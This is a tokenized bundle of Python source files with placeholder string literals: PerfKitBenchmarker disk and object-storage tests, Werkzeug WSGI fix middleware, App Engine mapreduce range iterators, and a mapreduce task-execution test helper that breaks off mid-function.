<s> """<STR_LIT>""" <EOL> import unittest <EOL> import mock <EOL> from perfkitbenchmarker import benchmark_spec <EOL> from perfkitbenchmarker import context <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker import virtual_machine <EOL> from perfkitbenchmarker . configs import benchmark_config_spec <EOL> from perfkitbenchmarker . providers . aws import aws_disk <EOL> from perfkitbenchmarker . providers . aws import aws_virtual_machine <EOL> from perfkitbenchmarker . providers . azure import azure_disk <EOL> from perfkitbenchmarker . providers . azure import flags as azure_flags <EOL> from perfkitbenchmarker . providers . azure import azure_virtual_machine <EOL> from perfkitbenchmarker . providers . gcp import gce_disk <EOL> from tests import mock_flags <EOL> _BENCHMARK_NAME = '<STR_LIT:name>' <EOL> _BENCHMARK_UID = '<STR_LIT>' <EOL> _COMPONENT = '<STR_LIT>' <EOL> class _DiskMetadataTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . addCleanup ( context . SetThreadBenchmarkSpec , None ) <EOL> config_spec = benchmark_config_spec . BenchmarkConfigSpec ( <EOL> _BENCHMARK_NAME , flag_values = mock_flags . MockFlags ( ) , vm_groups = { } ) <EOL> self . benchmark_spec = benchmark_spec . BenchmarkSpec ( <EOL> config_spec , _BENCHMARK_NAME , _BENCHMARK_UID ) <EOL> class GcpDiskMetadataTest ( _DiskMetadataTestCase ) : <EOL> def testPDStandard ( self ) : <EOL> disk_spec = disk . BaseDiskSpec ( _COMPONENT , disk_size = <NUM_LIT:2> , <EOL> disk_type = gce_disk . PD_STANDARD ) <EOL> disk_obj = gce_disk . GceDisk ( disk_spec , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( disk_obj . metadata , <EOL> { disk . MEDIA : disk . HDD , <EOL> disk . REPLICATION : disk . ZONE , <EOL> disk . LEGACY_DISK_TYPE : disk . 
STANDARD } ) <EOL> class AwsDiskMetadataTest ( _DiskMetadataTestCase ) : <EOL> def doAwsDiskTest ( self , disk_type , machine_type , <EOL> goal_media , goal_replication , goal_legacy_disk_type ) : <EOL> disk_spec = aws_disk . AwsDiskSpec ( _COMPONENT , disk_size = <NUM_LIT:2> , <EOL> disk_type = disk_type ) <EOL> vm_spec = virtual_machine . BaseVmSpec ( <EOL> '<STR_LIT>' , zone = '<STR_LIT>' , machine_type = machine_type ) <EOL> vm = aws_virtual_machine . DebianBasedAwsVirtualMachine ( <EOL> vm_spec ) <EOL> vm . CreateScratchDisk ( disk_spec ) <EOL> self . assertEqual ( vm . scratch_disks [ <NUM_LIT:0> ] . metadata , <EOL> { disk . MEDIA : goal_media , <EOL> disk . REPLICATION : goal_replication , <EOL> disk . LEGACY_DISK_TYPE : goal_legacy_disk_type } ) <EOL> def testLocalSSD ( self ) : <EOL> self . doAwsDiskTest ( <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . SSD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> def testLocalHDD ( self ) : <EOL> self . doAwsDiskTest ( <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . HDD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> class AzureDiskMetadataTest ( _DiskMetadataTestCase ) : <EOL> def doAzureDiskTest ( self , storage_type , disk_type , machine_type , <EOL> goal_media , goal_replication , goal_legacy_disk_type ) : <EOL> with mock . patch ( azure_disk . __name__ + '<STR_LIT>' ) as disk_flags : <EOL> disk_flags . azure_storage_type = storage_type <EOL> disk_spec = disk . BaseDiskSpec ( _COMPONENT , disk_size = <NUM_LIT:2> , <EOL> disk_type = disk_type ) <EOL> vm_spec = virtual_machine . BaseVmSpec ( <EOL> '<STR_LIT>' , zone = '<STR_LIT>' , machine_type = machine_type ) <EOL> vm = azure_virtual_machine . DebianBasedAzureVirtualMachine ( <EOL> vm_spec ) <EOL> azure_disk . AzureDisk . Create = mock . Mock ( ) <EOL> azure_disk . AzureDisk . Attach = mock . Mock ( ) <EOL> vm . CreateScratchDisk ( disk_spec ) <EOL> self . assertEqual ( vm . scratch_disks [ <NUM_LIT:0> ] . metadata , <EOL> { disk . 
MEDIA : goal_media , <EOL> disk . REPLICATION : goal_replication , <EOL> disk . LEGACY_DISK_TYPE : goal_legacy_disk_type } ) <EOL> def testPremiumStorage ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . PLRS , <EOL> azure_disk . PREMIUM_STORAGE , <EOL> '<STR_LIT>' , <EOL> disk . SSD , <EOL> disk . ZONE , <EOL> disk . REMOTE_SSD ) <EOL> def testStandardDisk ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . ZRS , <EOL> azure_disk . STANDARD_DISK , <EOL> '<STR_LIT>' , <EOL> disk . HDD , <EOL> disk . REGION , <EOL> disk . STANDARD ) <EOL> def testLocalHDD ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . LRS , <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . HDD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> def testLocalSSD ( self ) : <EOL> self . doAzureDiskTest ( azure_flags . LRS , <EOL> disk . LOCAL , <EOL> '<STR_LIT>' , <EOL> disk . SSD , <EOL> disk . NONE , <EOL> disk . LOCAL ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import mock <EOL> import unittest <EOL> import time <EOL> from perfkitbenchmarker . linux_benchmarks import object_storage_service_benchmark <EOL> from tests import mock_flags <EOL> class TestBuildCommands ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> mocked_flags = mock_flags . PatchTestCaseFlags ( self ) <EOL> mocked_flags . object_storage_scenario = '<STR_LIT>' <EOL> mocked_flags . object_storage_multistream_objects_per_stream = <NUM_LIT:100> <EOL> mocked_flags . object_storage_object_sizes = { '<STR_LIT>' : '<STR_LIT>' } <EOL> mocked_flags . object_storage_multistream_num_streams = <NUM_LIT:10> <EOL> def testBuildCommands ( self ) : <EOL> vm = mock . MagicMock ( ) <EOL> vm . RobustRemoteCommand = mock . MagicMock ( return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> with mock . patch ( time . __name__ + '<STR_LIT>' , return_value = <NUM_LIT:1.0> ) : <EOL> with mock . patch ( object_storage_service_benchmark . __name__ + <EOL> '<STR_LIT>' ) : <EOL> object_storage_service_benchmark . ApiBasedBenchmarks ( <EOL> [ ] , { } , vm , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> vm . RobustRemoteCommand . call_args_list [ <NUM_LIT:0> ] , <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> should_log = True ) ) <EOL> self . assertEqual ( <EOL> vm . RobustRemoteCommand . call_args_list [ <NUM_LIT:1> ] , <EOL> mock . call ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> should_log = True ) ) <EOL> class TestDistributionToBackendFormat ( unittest . TestCase ) : <EOL> def testPointDistribution ( self ) : <EOL> dist = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertEqual ( <EOL> object_storage_service_benchmark . 
_DistributionToBackendFormat ( dist ) , <EOL> { <NUM_LIT> : <NUM_LIT> } ) <EOL> def testMultiplePointsDistribution ( self ) : <EOL> dist = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertEqual ( <EOL> object_storage_service_benchmark . _DistributionToBackendFormat ( dist ) , <EOL> { <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT> } ) <EOL> def testAbbreviatedPointDistribution ( self ) : <EOL> dist = '<STR_LIT>' <EOL> self . assertEqual ( <EOL> object_storage_service_benchmark . _DistributionToBackendFormat ( dist ) , <EOL> { <NUM_LIT> : <NUM_LIT> } ) <EOL> def testBadPercentages ( self ) : <EOL> dist = { '<STR_LIT>' : '<STR_LIT>' } <EOL> with self . assertRaises ( ValueError ) : <EOL> object_storage_service_benchmark . _DistributionToBackendFormat ( dist ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import site <EOL> import os . path <EOL> import sys <EOL> def add ( folder , index = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> site_dir = os . path . join ( folder , '<STR_LIT>' , '<STR_LIT>' + sys . version [ : <NUM_LIT:3> ] , '<STR_LIT>' ) <EOL> if os . path . exists ( site_dir ) : <EOL> folder = site_dir <EOL> else : <EOL> folder = os . path . join ( os . path . dirname ( __file__ ) , folder ) <EOL> sys . path , remainder = sys . path [ : <NUM_LIT:1> ] , sys . path [ <NUM_LIT:1> : ] <EOL> site . addsitedir ( folder ) <EOL> sys . path . extend ( remainder ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from urllib import unquote <EOL> except ImportError : <EOL> from urllib . parse import unquote <EOL> from werkzeug . http import parse_options_header , parse_cache_control_header , parse_set_header <EOL> from werkzeug . useragents import UserAgent <EOL> from werkzeug . datastructures import Headers , ResponseCacheControl <EOL> class CGIRootFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , app_root = '<STR_LIT:/>' ) : <EOL> self . app = app <EOL> self . app_root = app_root <EOL> def __call__ ( self , environ , start_response ) : <EOL> if '<STR_LIT>' not in environ or environ [ '<STR_LIT>' ] < '<STR_LIT>' : <EOL> environ [ '<STR_LIT>' ] = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) + environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ [ '<STR_LIT>' ] = self . app_root . strip ( '<STR_LIT:/>' ) <EOL> return self . app ( environ , start_response ) <EOL> LighttpdCGIRootFix = CGIRootFix <EOL> class PathInfoFromRequestUriFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app ) : <EOL> self . app = app <EOL> def __call__ ( self , environ , start_response ) : <EOL> for key in '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' : <EOL> if key not in environ : <EOL> continue <EOL> request_uri = unquote ( environ [ key ] ) <EOL> script_name = unquote ( environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if request_uri . startswith ( script_name ) : <EOL> environ [ '<STR_LIT>' ] = request_uri [ len ( script_name ) : ] . split ( '<STR_LIT:?>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> break <EOL> return self . app ( environ , start_response ) <EOL> class ProxyFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , num_proxies = <NUM_LIT:1> ) : <EOL> self . app = app <EOL> self . num_proxies = num_proxies <EOL> def get_remote_addr ( self , forwarded_for ) : <EOL> """<STR_LIT>""" <EOL> if len ( forwarded_for ) >= self . num_proxies : <EOL> return forwarded_for [ - <NUM_LIT:1> * self . 
num_proxies ] <EOL> def __call__ ( self , environ , start_response ) : <EOL> getter = environ . get <EOL> forwarded_proto = getter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> forwarded_for = getter ( '<STR_LIT>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) <EOL> forwarded_host = getter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ . update ( { <EOL> '<STR_LIT>' : getter ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : getter ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : getter ( '<STR_LIT>' ) <EOL> } ) <EOL> forwarded_for = [ x for x in [ x . strip ( ) for x in forwarded_for ] if x ] <EOL> remote_addr = self . get_remote_addr ( forwarded_for ) <EOL> if remote_addr is not None : <EOL> environ [ '<STR_LIT>' ] = remote_addr <EOL> if forwarded_host : <EOL> environ [ '<STR_LIT>' ] = forwarded_host <EOL> if forwarded_proto : <EOL> environ [ '<STR_LIT>' ] = forwarded_proto <EOL> return self . app ( environ , start_response ) <EOL> class HeaderRewriterFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , remove_headers = None , add_headers = None ) : <EOL> self . app = app <EOL> self . remove_headers = set ( x . lower ( ) for x in ( remove_headers or ( ) ) ) <EOL> self . add_headers = list ( add_headers or ( ) ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> def rewriting_start_response ( status , headers , exc_info = None ) : <EOL> new_headers = [ ] <EOL> for key , value in headers : <EOL> if key . lower ( ) not in self . remove_headers : <EOL> new_headers . append ( ( key , value ) ) <EOL> new_headers += self . add_headers <EOL> return start_response ( status , new_headers , exc_info ) <EOL> return self . app ( environ , rewriting_start_response ) <EOL> class InternetExplorerFix ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , fix_vary = True , fix_attach = True ) : <EOL> self . app = app <EOL> self . fix_vary = fix_vary <EOL> self . fix_attach = fix_attach <EOL> def fix_headers ( self , environ , headers , status = None ) : <EOL> if self . 
fix_vary : <EOL> header = headers . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mimetype , options = parse_options_header ( header ) <EOL> if mimetype not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> headers . pop ( '<STR_LIT>' , None ) <EOL> if self . fix_attach and '<STR_LIT>' in headers : <EOL> pragma = parse_set_header ( headers . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> pragma . discard ( '<STR_LIT>' ) <EOL> header = pragma . to_header ( ) <EOL> if not header : <EOL> headers . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> headers [ '<STR_LIT>' ] = header <EOL> header = headers . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if header : <EOL> cc = parse_cache_control_header ( header , <EOL> cls = ResponseCacheControl ) <EOL> cc . no_cache = None <EOL> cc . no_store = False <EOL> header = cc . to_header ( ) <EOL> if not header : <EOL> headers . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> headers [ '<STR_LIT>' ] = header <EOL> def run_fixed ( self , environ , start_response ) : <EOL> def fixing_start_response ( status , headers , exc_info = None ) : <EOL> headers = Headers ( headers ) <EOL> self . fix_headers ( environ , headers , status ) <EOL> return start_response ( status , headers . to_wsgi_list ( ) , exc_info ) <EOL> return self . app ( environ , fixing_start_response ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> ua = UserAgent ( environ ) <EOL> if ua . browser != '<STR_LIT>' : <EOL> return self . app ( environ , start_response ) <EOL> return self . run_fixed ( environ , start_response ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> from google . appengine . datastore import datastore_query <EOL> from google . appengine . datastore import datastore_rpc <EOL> from google . appengine . ext import db <EOL> from google . appengine . ext import key_range <EOL> from mapreduce import json_util <EOL> from mapreduce import key_ranges <EOL> from mapreduce import model <EOL> from mapreduce import namespace_range <EOL> from mapreduce import property_range <EOL> from mapreduce import util <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> class RangeIteratorFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def create_property_range_iterator ( cls , <EOL> p_range , <EOL> ns_range , <EOL> query_spec ) : <EOL> """<STR_LIT>""" <EOL> return _PropertyRangeModelIterator ( p_range , <EOL> ns_range , <EOL> query_spec ) <EOL> @ classmethod <EOL> def create_multi_property_range_iterator ( cls , <EOL> p_range_iters ) : <EOL> """<STR_LIT>""" <EOL> return _MultiPropertyRangeModelIterator ( p_range_iters ) <EOL> @ classmethod <EOL> def create_key_ranges_iterator ( cls , <EOL> k_ranges , <EOL> query_spec , <EOL> key_range_iter_cls ) : <EOL> """<STR_LIT>""" <EOL> return _KeyRangesIterator ( k_ranges , query_spec , key_range_iter_cls ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> return _RANGE_ITERATORS [ json [ "<STR_LIT:name>" ] ] . from_json ( json ) <EOL> class RangeIterator ( json_util . 
JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def __repr__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class _PropertyRangeModelIterator ( RangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , p_range , ns_range , query_spec ) : <EOL> """<STR_LIT>""" <EOL> self . _property_range = p_range <EOL> self . _ns_range = ns_range <EOL> self . _query_spec = query_spec <EOL> self . _cursor = None <EOL> self . _query = None <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % str ( self . _property_range ) <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> for ns in self . _ns_range : <EOL> self . _query = self . _property_range . make_query ( ns ) <EOL> if isinstance ( self . _query , db . Query ) : <EOL> if self . _cursor : <EOL> self . _query . with_cursor ( self . _cursor ) <EOL> for model_instance in self . _query . run ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only ) : <EOL> yield model_instance <EOL> else : <EOL> self . _query = self . _query . iter ( batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only , <EOL> start_cursor = self . _cursor , <EOL> produce_cursors = True ) <EOL> for model_instance in self . _query : <EOL> yield model_instance <EOL> self . _query = None <EOL> self . _cursor = None <EOL> if ns != self . _ns_range . namespace_end : <EOL> self . _ns_range = self . _ns_range . with_start_after ( ns ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> cursor = self . _cursor <EOL> if self . _query is not None : <EOL> if isinstance ( self . _query , db . Query ) : <EOL> cursor = self . _query . cursor ( ) <EOL> else : <EOL> cursor = self . 
_query . cursor_after ( ) <EOL> if cursor is None or isinstance ( cursor , basestring ) : <EOL> cursor_object = False <EOL> else : <EOL> cursor_object = True <EOL> cursor = cursor . to_websafe_string ( ) <EOL> return { "<STR_LIT>" : self . _property_range . to_json ( ) , <EOL> "<STR_LIT>" : self . _query_spec . to_json ( ) , <EOL> "<STR_LIT>" : cursor , <EOL> "<STR_LIT>" : self . _ns_range . to_json_object ( ) , <EOL> "<STR_LIT:name>" : self . __class__ . __name__ , <EOL> "<STR_LIT>" : cursor_object } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> obj = cls ( property_range . PropertyRange . from_json ( json [ "<STR_LIT>" ] ) , <EOL> namespace_range . NamespaceRange . from_json_object ( json [ "<STR_LIT>" ] ) , <EOL> model . QuerySpec . from_json ( json [ "<STR_LIT>" ] ) ) <EOL> cursor = json [ "<STR_LIT>" ] <EOL> if cursor and json [ "<STR_LIT>" ] : <EOL> obj . _cursor = datastore_query . Cursor . from_websafe_string ( cursor ) <EOL> else : <EOL> obj . _cursor = cursor <EOL> return obj <EOL> class _MultiPropertyRangeModelIterator ( RangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , p_range_iters ) : <EOL> """<STR_LIT>""" <EOL> self . _iters = p_range_iters <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % str ( <EOL> [ str ( it ) for it in self . _iters ] ) <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> for model_instance in itertools . chain . from_iterable ( self . _iters ) : <EOL> yield model_instance <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> json = { "<STR_LIT:name>" : self . __class__ . __name__ , <EOL> "<STR_LIT>" : len ( self . _iters ) } <EOL> for i in xrange ( len ( self . _iters ) ) : <EOL> json_item = self . _iters [ i ] . 
to_json ( ) <EOL> query_spec = json_item [ "<STR_LIT>" ] <EOL> item_name = json_item [ "<STR_LIT:name>" ] <EOL> del json_item [ "<STR_LIT>" ] <EOL> del json_item [ "<STR_LIT:name>" ] <EOL> json [ str ( i ) ] = json_item <EOL> json [ "<STR_LIT>" ] = query_spec <EOL> json [ "<STR_LIT>" ] = item_name <EOL> return json <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> num_ranges = int ( json [ "<STR_LIT>" ] ) <EOL> query_spec = json [ "<STR_LIT>" ] <EOL> item_name = json [ "<STR_LIT>" ] <EOL> p_range_iters = [ ] <EOL> for i in xrange ( num_ranges ) : <EOL> json_item = json [ str ( i ) ] <EOL> json_item [ "<STR_LIT>" ] = query_spec <EOL> json_item [ "<STR_LIT:name>" ] = item_name <EOL> p_range_iters . append ( _PropertyRangeModelIterator . from_json ( json_item ) ) <EOL> obj = cls ( p_range_iters ) <EOL> return obj <EOL> class _KeyRangesIterator ( RangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> k_ranges , <EOL> query_spec , <EOL> key_range_iter_cls ) : <EOL> """<STR_LIT>""" <EOL> self . _key_ranges = k_ranges <EOL> self . _query_spec = query_spec <EOL> self . _key_range_iter_cls = key_range_iter_cls <EOL> self . _current_iter = None <EOL> self . _current_key_range = None <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % str ( self . _key_ranges ) <EOL> def __iter__ ( self ) : <EOL> while True : <EOL> if self . _current_iter : <EOL> for o in self . _current_iter : <EOL> yield o <EOL> try : <EOL> k_range = self . _key_ranges . next ( ) <EOL> self . _current_iter = self . _key_range_iter_cls ( k_range , <EOL> self . _query_spec ) <EOL> except StopIteration : <EOL> self . _current_iter = None <EOL> break <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> current_iter = None <EOL> if self . _current_iter : <EOL> current_iter = self . _current_iter . to_json ( ) <EOL> return { "<STR_LIT>" : self . _key_ranges . to_json ( ) , <EOL> "<STR_LIT>" : self . _query_spec . 
to_json ( ) , <EOL> "<STR_LIT>" : current_iter , <EOL> "<STR_LIT>" : self . _key_range_iter_cls . __name__ , <EOL> "<STR_LIT:name>" : self . __class__ . __name__ } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> key_range_iter_cls = _KEY_RANGE_ITERATORS [ json [ "<STR_LIT>" ] ] <EOL> obj = cls ( key_ranges . KeyRangesFactory . from_json ( json [ "<STR_LIT>" ] ) , <EOL> model . QuerySpec . from_json ( json [ "<STR_LIT>" ] ) , <EOL> key_range_iter_cls ) <EOL> current_iter = None <EOL> if json [ "<STR_LIT>" ] : <EOL> current_iter = key_range_iter_cls . from_json ( json [ "<STR_LIT>" ] ) <EOL> obj . _current_iter = current_iter <EOL> return obj <EOL> _RANGE_ITERATORS = { <EOL> _PropertyRangeModelIterator . __name__ : _PropertyRangeModelIterator , <EOL> _MultiPropertyRangeModelIterator . __name__ : _MultiPropertyRangeModelIterator , <EOL> _KeyRangesIterator . __name__ : _KeyRangesIterator <EOL> } <EOL> class AbstractKeyRangeIterator ( json_util . JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , k_range , query_spec ) : <EOL> """<STR_LIT>""" <EOL> self . _key_range = k_range <EOL> self . _query_spec = query_spec <EOL> self . _cursor = None <EOL> self . _query = None <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _get_cursor ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> cursor = self . _get_cursor ( ) <EOL> cursor_object = False <EOL> if cursor and isinstance ( cursor , datastore_query . Cursor ) : <EOL> cursor = cursor . to_websafe_string ( ) <EOL> cursor_object = True <EOL> return { "<STR_LIT>" : self . _key_range . to_json ( ) , <EOL> "<STR_LIT>" : self . _query_spec . to_json ( ) , <EOL> "<STR_LIT>" : cursor , <EOL> "<STR_LIT>" : cursor_object } <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> obj = cls ( key_range . KeyRange . 
from_json ( json [ "<STR_LIT>" ] ) , <EOL> model . QuerySpec . from_json ( json [ "<STR_LIT>" ] ) ) <EOL> cursor = json [ "<STR_LIT>" ] <EOL> if cursor and json [ "<STR_LIT>" ] : <EOL> obj . _cursor = datastore_query . Cursor . from_websafe_string ( cursor ) <EOL> else : <EOL> obj . _cursor = cursor <EOL> return obj <EOL> class KeyRangeModelIterator ( AbstractKeyRangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> self . _query = self . _key_range . make_ascending_query ( <EOL> util . for_name ( self . _query_spec . model_class_path ) , <EOL> filters = self . _query_spec . filters ) <EOL> if isinstance ( self . _query , db . Query ) : <EOL> if self . _cursor : <EOL> self . _query . with_cursor ( self . _cursor ) <EOL> for model_instance in self . _query . run ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only ) : <EOL> yield model_instance <EOL> else : <EOL> self . _query = self . _query . iter ( batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only , <EOL> start_cursor = self . _cursor , <EOL> produce_cursors = True ) <EOL> for model_instance in self . _query : <EOL> yield model_instance <EOL> def _get_cursor ( self ) : <EOL> if self . _query is None : <EOL> return self . _cursor <EOL> if isinstance ( self . _query , db . Query ) : <EOL> return self . _query . cursor ( ) <EOL> else : <EOL> return self . _query . cursor_after ( ) <EOL> class KeyRangeEntityIterator ( AbstractKeyRangeIterator ) : <EOL> """<STR_LIT>""" <EOL> _KEYS_ONLY = False <EOL> def __iter__ ( self ) : <EOL> self . _query = self . _key_range . make_ascending_datastore_query ( <EOL> self . _query_spec . entity_kind , filters = self . _query_spec . filters ) <EOL> for entity in self . _query . Run ( config = datastore_query . QueryOptions ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> keys_only = self . _query_spec . keys_only or self . 
_KEYS_ONLY , <EOL> start_cursor = self . _cursor ) ) : <EOL> yield entity <EOL> def _get_cursor ( self ) : <EOL> if self . _query is None : <EOL> return self . _cursor <EOL> return self . _query . GetCursor ( ) <EOL> class KeyRangeKeyIterator ( KeyRangeEntityIterator ) : <EOL> """<STR_LIT>""" <EOL> _KEYS_ONLY = True <EOL> class KeyRangeEntityProtoIterator ( AbstractKeyRangeIterator ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> query = self . _key_range . make_ascending_datastore_query ( <EOL> self . _query_spec . entity_kind , filters = self . _query_spec . filters ) <EOL> connection = datastore_rpc . Connection ( ) <EOL> query_options = datastore_query . QueryOptions ( <EOL> batch_size = self . _query_spec . batch_size , <EOL> start_cursor = self . _cursor , <EOL> produce_cursors = True ) <EOL> self . _query = datastore_query . ResultsIterator ( <EOL> query . GetQuery ( ) . run ( connection , query_options ) ) <EOL> for entity_proto in self . _query : <EOL> yield entity_proto <EOL> def _get_cursor ( self ) : <EOL> if self . _query is None : <EOL> return self . _cursor <EOL> return self . _query . cursor ( ) <EOL> _KEY_RANGE_ITERATORS = { <EOL> KeyRangeModelIterator . __name__ : KeyRangeModelIterator , <EOL> KeyRangeEntityIterator . __name__ : KeyRangeEntityIterator , <EOL> KeyRangeKeyIterator . __name__ : KeyRangeKeyIterator , <EOL> KeyRangeEntityProtoIterator . __name__ : KeyRangeEntityProtoIterator <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import collections <EOL> import logging <EOL> import os <EOL> import re <EOL> from mapreduce import main <EOL> from mapreduce import model <EOL> from google . appengine . ext . webapp import mock_webapp <EOL> _LOGGING_LEVEL = logging . ERROR <EOL> logging . getLogger ( ) . setLevel ( _LOGGING_LEVEL ) <EOL> def decode_task_payload ( task ) : <EOL> """<STR_LIT>""" <EOL> if not task : <EOL> return { } <EOL> body = base64 . b64decode ( task [ "<STR_LIT:body>" ] ) <EOL> return model . HugeTask . _decode_payload ( body ) <EOL> def execute_task ( task , retries = <NUM_LIT:0> , handlers_map = None ) : <EOL> """<STR_LIT>""" <EOL> if not handlers_map : <EOL> handlers_map = main . create_handlers_map ( ) <EOL> url = task [ "<STR_LIT:url>" ] <EOL> handler = None <EOL> params = [ ] <EOL> for ( re_str , handler_class ) in handlers_map : <EOL> re_str = "<STR_LIT>" + re_str + "<STR_LIT>" <EOL> m = re . match ( re_str , url ) <EOL> if m : <EOL> params = m . groups ( ) [ : - <NUM_LIT:1> ] <EOL> break <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % task ) <EOL> request = mock_webapp . MockRequest ( ) <EOL> request . set_url ( url ) <EOL> version = "<STR_LIT>" <EOL> module = "<STR_LIT>" <EOL> default_version_hostname = "<STR_LIT>" <EOL> host = "<STR_LIT>" % ( version . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] , <EOL> module , <EOL> default_version_hostname ) <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = version <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = ( <EOL> default_version_hostname ) <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = module <EOL> if "<STR_LIT>" not in os . environ : <EOL> request . environ [ "<STR_LIT>" ] = host <EOL> for k , v in task . get ( "<STR_LIT>" , [ ] ) : <EOL> request . headers [ k ] = v <EOL> environ_key = "<STR_LIT>" + k . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) 